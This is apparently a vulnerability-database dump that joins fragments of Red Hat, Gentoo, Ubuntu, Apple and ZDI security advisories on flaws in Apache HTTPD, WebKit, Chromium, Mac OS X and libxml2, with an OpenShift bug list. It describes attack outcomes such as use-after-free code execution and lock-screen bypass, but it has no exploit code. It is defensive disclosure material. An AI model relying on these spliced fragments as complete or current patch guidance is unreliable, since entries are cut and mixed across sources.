https://access.redhat.com/security/cve/CVE-2021-34798
https://access.redhat.com/security/cve/CVE-2021-39275
https://access.redhat.com/security/cve/CVE-2021-44790
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYeVdC9zjgjWX9erEAQgzNw/8CjsxUvDW64dwvpcYH/OWJhKqvD53sX+w
ivf4+hhCsEVLvrjD0eTNkbeza+dcZqoR5swL0IjAGXKJ/0q/oh4/yxq2ydgvEYsY
rAjts0tnynoswBaFo6eaBlcNxQroGID0uqgXkUFt37m4eetACuOSVRcZ7/sNsqBS
iQF4l16vjNvKeOdKY8nSNe77Dt1/Lj41NoL6XbAZPuvaiLBqqGOY9xYfZSSmFHFq
H4dB8cfMC4cWysFtnzffJ+dJdzcWNOxklwLlZe72JoAJYP59da2YuIoE2LsQRGPC
Occ84zH/UZx4JWJhF7FEEALC/tizfFqu9qWr1OIDmSVTEAZ+6IZ/mDeF83+0Mrc4
AiV3oiJi7Fx4XTDUL8fim+FORaSI2IR7LK1Zjau1qCN04ayyFXwJdK/fwgIWJHon
gYhyUsAj7F7At9m8cCVRP5K4jjmr0qrmsF1M1B6xqMLWlYNcWu3obJS/FbiSdwQJ
7jFdBagThGOzIle0eGk0iMZ+vRJSuaSMZ7GDA14o46KB+EkvYLe+wi6jBQXJeD6Q
Oueenu2JiMvB8+dJNYrn9uQY+8WHyCVV1HMMmVo9LajA1FJRXgMIQN5ZmDMoDW73
qFV+VCOHtKPI2hC8ngZYy2RyEUhK4t3f7xmJgtoJ4/DuaGsRWL7xZPL7gLHxWnS4
5VjPyLrWg5U=TyMo
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. 8) - aarch64, noarch, ppc64le, s390x, x86_64
3. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202208-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Apache HTTPD: Multiple Vulnerabilities
Date: August 14, 2022
Bugs: #813429, #816399, #816864, #829722, #835131, #850622
ID: 202208-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
=======
Multiple vulnerabilities have been discovered in Apache Webserver, the
worst of which could result in remote code execution. Please
review the CVE identifiers referenced below for details.
Impact
=====
Please review the referenced CVE identifiers for details.
Workaround
=========
There is no known workaround at this time.
Resolution
=========
All Apache HTTPD users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-servers/apache-2.4.54"
All Apache HTTPD tools users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-admin/apache-tools-2.4.54"
References
=========
[ 1 ] CVE-2021-33193
https://nvd.nist.gov/vuln/detail/CVE-2021-33193
[ 2 ] CVE-2021-34798
https://nvd.nist.gov/vuln/detail/CVE-2021-34798
[ 3 ] CVE-2021-36160
https://nvd.nist.gov/vuln/detail/CVE-2021-36160
[ 4 ] CVE-2021-39275
https://nvd.nist.gov/vuln/detail/CVE-2021-39275
[ 5 ] CVE-2021-40438
https://nvd.nist.gov/vuln/detail/CVE-2021-40438
[ 6 ] CVE-2021-41524
https://nvd.nist.gov/vuln/detail/CVE-2021-41524
[ 7 ] CVE-2021-41773
https://nvd.nist.gov/vuln/detail/CVE-2021-41773
[ 8 ] CVE-2021-42013
https://nvd.nist.gov/vuln/detail/CVE-2021-42013
[ 9 ] CVE-2021-44224
https://nvd.nist.gov/vuln/detail/CVE-2021-44224
[ 10 ] CVE-2021-44790
https://nvd.nist.gov/vuln/detail/CVE-2021-44790
[ 11 ] CVE-2022-22719
https://nvd.nist.gov/vuln/detail/CVE-2022-22719
[ 12 ] CVE-2022-22720
https://nvd.nist.gov/vuln/detail/CVE-2022-22720
[ 13 ] CVE-2022-22721
https://nvd.nist.gov/vuln/detail/CVE-2022-22721
[ 14 ] CVE-2022-23943
https://nvd.nist.gov/vuln/detail/CVE-2022-23943
[ 15 ] CVE-2022-26377
https://nvd.nist.gov/vuln/detail/CVE-2022-26377
[ 16 ] CVE-2022-28614
https://nvd.nist.gov/vuln/detail/CVE-2022-28614
[ 17 ] CVE-2022-28615
https://nvd.nist.gov/vuln/detail/CVE-2022-28615
[ 18 ] CVE-2022-29404
https://nvd.nist.gov/vuln/detail/CVE-2022-29404
[ 19 ] CVE-2022-30522
https://nvd.nist.gov/vuln/detail/CVE-2022-30522
[ 20 ] CVE-2022-30556
https://nvd.nist.gov/vuln/detail/CVE-2022-30556
[ 21 ] CVE-2022-31813
https://nvd.nist.gov/vuln/detail/CVE-2022-31813
Availability
===========
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/202208-20
Concerns?
========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
======
Copyright 2022 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
. ==========================================================================
Ubuntu Security Notice USN-5090-3
September 28, 2021
apache2 regression
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 21.04
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
USN-5090-1 introduced a regression in Apache HTTP Server. One of the upstream
fixes introduced a regression in UDS URIs. This update fixes the problem.
Original advisory details:
James Kettle discovered that the Apache HTTP Server HTTP/2 module
incorrectly handled certain crafted methods. A remote attacker could
possibly use this issue to perform request splitting or cache poisoning
attacks. A remote attacker could possibly use this issue to
cause the server to crash, resulting in a denial of service.
(CVE-2021-34798)
Li Zhi Xin discovered that the Apache mod_proxy_uwsgi module incorrectly
handled certain request uri-paths. A remote attacker could possibly use
this issue to cause the server to crash, resulting in a denial of service.
This issue only affected Ubuntu 20.04 LTS and Ubuntu 21.04. If the server was configured with third-party modules, a remote
attacker could use this issue to cause the server to crash, resulting in a
denial of service, or possibly execute arbitrary code. (CVE-2021-39275)
It was discovered that the Apache mod_proxy module incorrectly handled
certain request uri-paths. A remote attacker could possibly use this issue
to cause the server to forward requests to arbitrary origin servers.
(CVE-2021-40438)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 21.04:
apache2 2.4.46-4ubuntu1.3
apache2-bin 2.4.46-4ubuntu1.3
Ubuntu 20.04 LTS:
apache2 2.4.41-4ubuntu3.6
apache2-bin 2.4.41-4ubuntu3.6
Ubuntu 18.04 LTS:
apache2 2.4.29-1ubuntu4.18
apache2-bin 2.4.29-1ubuntu4.18
In general, a standard system update will make all the necessary changes |
|
var-201111-0129
|
Use-after-free vulnerability in Google Chrome before 15.0.874.120 allows user-assisted remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to editing. plural Apple Product Webkit A similar vulnerability exists for. Detail is Apple See vendor information for.Denial of service by attacker (DoS) You may be put into a state or affected by other details. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the WebKit library. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists when the library attempts to replace a particular element due to an HTML5 ContentEditable command. Due to the library not accommodating for DOM mutation events that can be made to occur, an aggressor can modify the tree out from underneath the library, leading to a type change. This can be used to trigger a use-after-free condition at which point can lead to code execution under the context of the application. Google Chrome is prone to multiple vulnerabilities.
Versions prior to Chrome 15.0.874.120 are vulnerable. Google Chrome is a web browser developed by Google (Google).
These could be used in a malicious web site to direct the user to a
spoofed site that visually appears to be a legitimate domain. This
issue is addressed through an improved domain name validity check.
This issue does not affect OS X systems. Third-party websites could set cookies if the "Block Cookies"
preference in Safari was set to the default setting of "From third
parties and advertisers".
CVE-ID
CVE-2012-0640 : nshah
WebKit
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7.3, OS X Lion Server v10.7.3, Windows 7, Vista,
XP SP2 or later
Impact: HTTP authentication credentials may be inadvertently
disclosed to another site
Description: If a site uses HTTP authentication and redirects to
another site, the authentication credentials may be sent to the other
site. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-03-07-2 iOS 5.1 Software Update
iOS 5.1 Software Update is now available and addresses the following:
CFNetwork
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description: An issue existed in CFNetwork's handling of malformed
URLs. When accessing a maliciously crafted URL, CFNetwork could send
unexpected request headers.
CVE-ID
CVE-2012-0641 : Erling Ellingsen of Facebook
HFS
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Mounting a maliciously crafted disk image may lead to a
device shutdown or arbitrary code execution
Description: An integer underflow existed with the handling of HFS
catalog files.
CVE-ID
CVE-2012-0642 : pod2g
Kernel
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: A malicious program could bypass sandbox restrictions
Description: A logic issue existed in the handling of debug system
calls. This may allow a malicious program to gain code execution in
other programs with the same user privileges.
CVE-ID
CVE-2012-0643 : 2012 iOS Jailbreak Dream Team
libresolv
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Applications that use the libresolv library may be
vulnerable to an unexpected application termination or arbitrary code
execution
Description: An integer overflow existed in the handling of DNS
resource records, which may lead to heap memory corruption.
CVE-ID
CVE-2011-3453 : Ilja van Sprundel of IOActive
Passcode Lock
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: A person with physical access to the device may be able to
bypass the screen lock
Description: A race condition issue existed in the handling of slide
to dial gestures. This may allow a person with physical access to the
device to bypass the Passcode Lock screen.
CVE-ID
CVE-2012-0644 : Roland Kohler of the German Federal Ministry of
Economics and Technology
Safari
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Web page visits may be recorded in browser history even when
Private Browsing is active
Description: Safari's Private Browsing is designed to prevent
recording of a browsing session. Pages visited as a result of a site
using the JavaScript methods pushState or replaceState were recorded
in the browser history even when Private Browsing mode was active.
This issue is addressed by not recording such visits when Private
Browsing is active.
CVE-ID
CVE-2012-0585 : Eric Melville of American Express
Siri
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: An attacker with physical access to a locked phone could get
access to frontmost email message
Description: A design issue existed in Siri's lock screen
restrictions. If Siri was enabled for use on the lock screen, and
Mail was open with a message selected behind the lock screen, a voice
command could be used to send that message to an arbitrary recipient.
This issue is addressed by disabling forwarding of active messages
from the lock screen.
CVE-ID
CVE-2012-0645
VPN
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: A maliciously crafted system configuration file may lead to
arbitrary code execution with system privileges
Description: A format string vulnerability existed in the handling
of racoon configuration files.
CVE-ID
CVE-2012-0646 : pod2g
WebKit
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website may lead to the
disclosure of cookies
Description: A cross-origin issue existed in WebKit, which may allow
cookies to be disclosed across origins.
CVE-ID
CVE-2011-3887 : Sergey Glazunov
WebKit
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website and dragging content
with the mouse may lead to a cross-site scripting attack
Description: A cross-origin issue existed in WebKit, which may allow
content to be dragged and dropped across origins.
CVE-ID
CVE-2012-0590 : Adam Barth of Google Chrome Security Team
WebKit
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: Multiple cross-origin issues existed in WebKit.
CVE-ID
CVE-2011-3881 : Sergey Glazunov
CVE-2012-0586 : Sergey Glazunov
CVE-2012-0587 : Sergey Glazunov
CVE-2012-0588 : Jochen Eisinger of Google Chrome Team
CVE-2012-0589 : Alan Austin of polyvore.com
WebKit
Available for: iPhone 3GS, iPhone 4, iPhone 4S,
iPod touch (3rd generation) and later, iPad, iPad 2
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
CVE-ID
CVE-2011-2825 : wushi of team509 working with TippingPoint's Zero Day
Initiative
CVE-2011-2833 : Apple
CVE-2011-2846 : Arthur Gerkis, miaubiz
CVE-2011-2847 : miaubiz, Abhishek Arya (Inferno) of Google Chrome
Security Team using AddressSanitizer
CVE-2011-2854 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2011-2855 : Arthur Gerkis, wushi of team509 working with iDefense
VCP
CVE-2011-2857 : miaubiz
CVE-2011-2860 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2011-2867 : Dirk Schulze
CVE-2011-2868 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2011-2869 : Cris Neckar of Google Chrome Security Team using
AddressSanitizer
CVE-2011-2870 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2011-2871 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2011-2872 : Abhishek Arya (Inferno) and Cris Neckar of Google
Chrome Security Team using AddressSanitizer
CVE-2011-2873 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2011-2877 : miaubiz
CVE-2011-3885 : miaubiz
CVE-2011-3888 : miaubiz
CVE-2011-3897 : pa_kt working with TippingPoint's Zero Day Initiative
CVE-2011-3908 : Aki Helin of OUSPG
CVE-2011-3909 : Google Chrome Security Team (scarybeasts) and Chu
CVE-2011-3928 : wushi of team509 working with TippingPoint's Zero Day
Initiative
CVE-2012-0591 : miaubiz, and Martin Barbella
CVE-2012-0592 : Alexander Gavrun working with TippingPoint's Zero Day
Initiative
CVE-2012-0593 : Lei Zhang of the Chromium development community
CVE-2012-0594 : Adam Klein of the Chromium development community
CVE-2012-0595 : Apple
CVE-2012-0596 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0597 : miaubiz
CVE-2012-0598 : Sergey Glazunov
CVE-2012-0599 : Dmytro Gorbunov of SaveSources.com
CVE-2012-0600 : Marshall Greenblatt, Dharani Govindan of Google
Chrome, miaubiz, Aki Helin of OUSPG, Apple
CVE-2012-0601 : Apple
CVE-2012-0602 : Apple
CVE-2012-0603 : Apple
CVE-2012-0604 : Apple
CVE-2012-0605 : Apple
CVE-2012-0606 : Apple
CVE-2012-0607 : Apple
CVE-2012-0608 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0609 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0610 : miaubiz, Martin Barbella using AddressSanitizer
CVE-2012-0611 : Martin Barbella using AddressSanitizer
CVE-2012-0612 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0613 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0614 : miaubiz, Martin Barbella using AddressSanitizer
CVE-2012-0615 : Martin Barbella using AddressSanitizer
CVE-2012-0616 : miaubiz
CVE-2012-0617 : Martin Barbella using AddressSanitizer
CVE-2012-0618 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0619 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0620 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0621 : Martin Barbella using AddressSanitizer
CVE-2012-0622 : Dave Levin and Abhishek Arya of the Google Chrome
Security Team
CVE-2012-0623 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0624 : Martin Barbella using AddressSanitizer
CVE-2012-0625 : Martin Barbella
CVE-2012-0626 : Abhishek Arya (Inferno) of Google Chrome Security
Team using AddressSanitizer
CVE-2012-0627 : Apple
CVE-2012-0628 : Slawomir Blazek, miaubiz, Abhishek Arya (Inferno) of
Google Chrome Security Team using AddressSanitizer
CVE-2012-0629 : Abhishek Arya (Inferno) of Google Chrome Security
Team
CVE-2012-0630 : Sergio Villar Senin of Igalia
CVE-2012-0631 : Abhishek Arya (Inferno) of Google Chrome Security
Team
CVE-2012-0632 : Cris Neckar of the Google Chrome Security Team using
AddressSanitizer
CVE-2012-0633 : Apple
CVE-2012-0635 : Julien Chaffraix of the Chromium development
community, Martin Barbella using AddressSanitizer
Installation note:
This update is only available through iTunes, and will not appear
in your computer's Software Update application, or in the Apple
Downloads site. Make sure you have an Internet connection and have
installed the latest version of iTunes from www.apple.com/itunes/
iTunes will automatically check Apple's update server on its weekly
schedule. When an update is detected, it will download it. When
the iPhone, iPod touch or iPad is docked, iTunes will present the
user with the option to install the update. We recommend applying
the update immediately if possible. Selecting Don't Install will
present the option the next time you connect your iPhone, iPod touch,
or iPad.
The automatic update process may take up to a week depending on the
day that iTunes checks for updates. You may manually obtain the
update via the Check for Updates button within iTunes. After doing
this, the update can be applied when your iPhone, iPod touch, or iPad
is docked to your computer.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update will be "5.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.16 (Darwin)
iQEcBAEBAgAGBQJPV6M3AAoJEGnF2JsdZQeef/cIAKBSn0czLzJO9fu6ZyjLRvxq
4pIZgfyEVGBzpn+9IeiGFTkkVf+bOsA+Q3RlcsG5g0RlbyFgnuWu59HHsnkrElbM
bCfnnTF5eYZX/3fnLzxpX7BUsEona3nf1gHfR24OeEn36C8rZ6rZJfMLqCJNNZGY
RDSga1oeMN/AbgZuR9sYKudkE0GOmkLZfR2G4WXmrU+JncR6XoROUwoJBPhg8z90
HAxgDEbduuLLOSe7CHLS3apbh0L2tmxPCWpiBmEMg6PTlFF0HhJQJ0wusrUc8nX6
7TDsAho73wCOpChzBGQeemc6+UEN2uDmUgwVkN6n4D/qN1u6E+d3coUXOlb8hIY=
=qPeE
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ZDI-12-147 : WebKit ContentEditable swapInNode Use-After-Free Remote Code
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-147
August 22, 2012
- -- CVE ID:
CVE-2011-3897
- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P
- -- Affected Vendors:
WebKit.Org
- -- Affected Products:
WebKit.Org WebKit
- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12492.
- -- Vendor Response:
WebKit.Org has issued an update to correct this vulnerability. More details
can be found at:
https://bugs.webkit.org/show_bug.cgi?id=71145
- -- Disclosure Timeline:
2011-10-28 - Vulnerability reported to vendor
2012-08-22 - Coordinated public release of advisory
- -- Credit:
This vulnerability was discovered by:
* pa_kt / twitter.com/pa_kt
- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201111-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Chromium, V8: Multiple vulnerabilities
Date: November 19, 2011
Bugs: #390113, #390779
ID: 201111-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been reported in Chromium and V8, some of
which may allow execution of arbitrary code.
Background
==========
Chromium is an open-source web browser project. V8 is Google's open
source JavaScript engine.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/chromium < 15.0.874.121 >= 15.0.874.121
2 dev-lang/v8 < 3.5.10.24 >= 3.5.10.24
-------------------------------------------------------------------
2 affected packages
-------------------------------------------------------------------
Description
===========
Multiple vulnerabilities have been discovered in Chromium and V8.
Please review the CVE identifiers and release notes referenced below
for details.
Impact
======
A context-dependent attacker could entice a user to open a specially
crafted web site or JavaScript program using Chromium or V8, possibly
resulting in the execution of arbitrary code with the privileges of the
process, or a Denial of Service condition. The attacker also could
cause a Java applet to run without user confirmation.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Chromium users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-client/chromium-15.0.874.121"
All V8 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/v8-3.5.10.24"
References
==========
[ 1 ] CVE-2011-3892
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3892
[ 2 ] CVE-2011-3893
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3893
[ 3 ] CVE-2011-3894
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3894
[ 4 ] CVE-2011-3895
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3895
[ 5 ] CVE-2011-3896
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3896
[ 6 ] CVE-2011-3897
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3897
[ 7 ] CVE-2011-3898
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3898
[ 8 ] CVE-2011-3900
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3900
[ 9 ] Release Notes 15.0.874.120
http://googlechromereleases.blogspot.com/2011/11/stable-channel-update.html
[ 10 ] Release Notes 15.0.874.121
http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201111-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
|
|
var-200611-0488
|
Unspecified vulnerability in Apple Mac OS X 10.4.8, and possibly other versions, allows remote attackers to cause a denial of service (crash) via a malformed UDTO HFS+ disk image, such as with "bad sectors," which triggers memory corruption. Apple Mac OS X fails to properly handle corrupted UDTO HFS+ image structures. This vulnerability may allow an attacker to cause a denial-of-service condition.
Successfully exploiting this issue allows remote users to crash affected computers, denying service to legitimate users.
Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected.
Note: Further information from Alastair Houghton reports that this issue cannot be exploited to execute arbitrary code. See the references for details. Attackers may also be able to exploit this issue for remote code execution, but this is reportedly unlikely |
|
var-202001-1866
|
xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation. There is a security vulnerability in the xmlStringLenDecodeEntities of the parser.c file in libxml2 version 2.9.10. It exists that libxml2 incorrectly handled certain XML files.
(CVE-2019-19956, CVE-2020-7595). Description:
Red Hat OpenShift Container Storage is software-defined storage integrated
with and optimized for the Red Hat OpenShift Container Platform. Red Hat
OpenShift Container Storage is a highly scalable, production-grade
persistent storage for stateful applications running in the Red Hat
OpenShift Container Platform. In addition to persistent storage, Red Hat
OpenShift Container Storage provisions a multicloud data management service
with an S3 compatible API.
These updated images include numerous security fixes, bug fixes, and
enhancements. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1806266 - Require an extension to the cephfs subvolume commands, that can return metadata regarding a subvolume
1813506 - Dockerfile not compatible with docker and buildah
1817438 - OSDs not distributed uniformly across OCS nodes on a 9-node AWS IPI setup
1817850 - [BAREMETAL] rook-ceph-operator does not reconcile when osd deployment is deleted when performed node replacement
1827157 - OSD hitting default CPU limit on AWS i3en.2xlarge instances limiting performance
1829055 - [RFE] add insecureEdgeTerminationPolicy: Redirect to noobaa mgmt route (http to https)
1833153 - add a variable for sleep time of rook operator between checks of downed OSD+Node.
1836299 - NooBaa Operator deploys with HPA that fires maxreplicas alerts by default
1842254 - [NooBaa] Compression stats do not add up when compression id disabled
1845976 - OCS 4.5 Independent mode: must-gather commands fails to collect ceph command outputs from external cluster
1849771 - [RFE] Account created by OBC should have same permissions as bucket owner
1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
1854500 - [tracker-rhcs bug 1838931] mgr/volumes: add command to return metadata of a subvolume snapshot
1854501 - [Tracker-rhcs bug 1848494 ]pybind/mgr/volumes: Add the ability to keep snapshots of subvolumes independent of the source subvolume
1854503 - [tracker-rhcs-bug 1848503] cephfs: Provide alternatives to increase the total cephfs subvolume snapshot counts to greater than the current 400 across a Cephfs volume
1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS
1858195 - [GSS] registry pod stuck in ContainerCreating due to pvc from cephfs storage class fail to mount
1859183 - PV expansion is failing in retry loop in pre-existing PV after upgrade to OCS 4.5 (i.e. if the PV spec does not contain expansion params)
1859229 - Rook should delete extra MON PVCs in case first reconcile takes too long and rook skips "b" and "c" (spawned from Bug 1840084#c14)
1859478 - OCS 4.6 : Upon deployment, CSI Pods in CLBO with error - flag provided but not defined: -metadatastorage
1860022 - OCS 4.6 Deployment: LBP CSV and pod should not be deployed since ob/obc CRDs are owned from OCS 4.5 onwards
1860034 - OCS 4.6 Deployment in ocs-ci : Toolbox pod in ContainerCreationError due to key admin-secret not found
1860670 - OCS 4.5 Uninstall External: Openshift-storage namespace in Terminating state as CephObjectStoreUser had finalizers remaining
1860848 - Add validation for rgw-pool-prefix in the ceph-external-cluster-details-exporter script
1861780 - [Tracker BZ1866386][IBM s390x] Mount Failed for CEPH while running couple of OCS test cases.
1865938 - CSIDrivers missing in OCS 4.6
1867024 - [ocs-operator] operator v4.6.0-519.ci is in Installing state
1867099 - CVE-2020-16845 golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs
1868060 - [External Cluster] Noobaa-default-backingstore PV in released state upon OCS 4.5 uninstall (Secret not found)
1868703 - [rbd] After volume expansion, the new size is not reflected on the pod
1869411 - capture full crash information from ceph
1870061 - [RHEL][IBM] OCS un-install should make the devices raw
1870338 - OCS 4.6 must-gather : ocs-must-gather-xxx-helper pod in ContainerCreationError (couldn't find key admin-secret)
1870631 - OCS 4.6 Deployment : RGW pods went into 'CrashLoopBackOff' state on Z Platform
1872119 - Updates don't work on StorageClass which will keep PV expansion disabled for upgraded cluster
1872696 - [ROKS][RFE]NooBaa Configure IBM COS as default backing store
1873864 - Noobaa: On an baremetal RHCOS cluster, some backingstores are stuck in PROGRESSING state with INVALID_ENDPOINT TemporaryError
1874606 - CVE-2020-7720 nodejs-node-forge: prototype pollution via the util.setPath function
1875476 - Change noobaa logo in the noobaa UI
1877339 - Incorrect use of logr
1877371 - NooBaa UI warning message on Deploy Kubernetes Pool process - typo and shown number is incorrect
1878153 - OCS 4.6 must-gather: collect node information under cluster_scoped_resources/oc_output directory
1878714 - [FIPS enabled] BadDigest error on file upload to noobaa bucket
1878853 - [External Mode] ceph-external-cluster-details-exporter.py does not tolerate TLS enabled RGW
1879008 - ocs-osd-removal job fails because it can't find admin-secret in rook-ceph-mon secret
1879072 - Deployment with encryption at rest is failing to bring up OSD pods
1879919 - [External] Upgrade mechanism from OCS 4.5 to OCS 4.6 needs to be fixed
1880255 - Collect rbd info and subvolume info and snapshot info command output
1881028 - CVE-2020-8237 nodejs-json-bigint: Prototype pollution via `__proto__` assignment could result in DoS
1881071 - [External] Upgrade mechanism from OCS 4.5 to OCS 4.6 needs to be fixed
1882397 - MCG decompression problem with snappy on s390x arch
1883253 - CSV doesn't contain values required for UI to enable minimal deployment and cluster encryption
1883398 - Update csi sidecar containers in rook
1883767 - Using placement strategies in cluster-service.yaml causes ocs-operator to crash
1883810 - [External mode] RGW metrics is not available after OCS upgrade from 4.5 to 4.6
